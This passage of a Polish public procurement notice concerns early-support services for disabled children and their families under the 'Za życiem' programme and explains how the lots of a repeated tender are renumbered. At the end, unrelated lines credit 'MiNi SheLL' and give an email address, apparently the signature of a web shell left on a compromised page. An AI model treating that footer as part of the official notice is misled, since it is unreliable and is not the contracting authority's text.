roku 2024.<br/><br/>Przedmiotem zamówienia jest realizacja zadań z zakresu administracji rządowej, wynikających<br/>z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 roku zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem&#34; (M.P. Z 2022 poz. 64) zwanego dalej „Programem&#34; w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. poz. 1712) wynikających z zadania 2.4. Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Ze względu na to, iż jest to już drugie postępowanie Zamawiający powtarza części, które zostały unieważnione i stąd nazwy części zostały nazwane następująco: <br/>CZĘŚĆ I TO CZĘŚĆ III<br/>CZĘŚĆ II TO CZĘŚĆ VI<br/>CZĘŚĆ III TO CZĘŚĆ X<br/>CZĘŚĆ IV TO CZĘŚĆ XI<br/>CZĘŚĆ V TO CZĘŚĆ XIII<br/>CZĘŚĆ VI TO CZĘŚĆ XVII<br/>CZĘŚĆ VII TO CZĘŚĆ XVIII

Creat By MiNi SheLL
Email: jattceo@gmail.com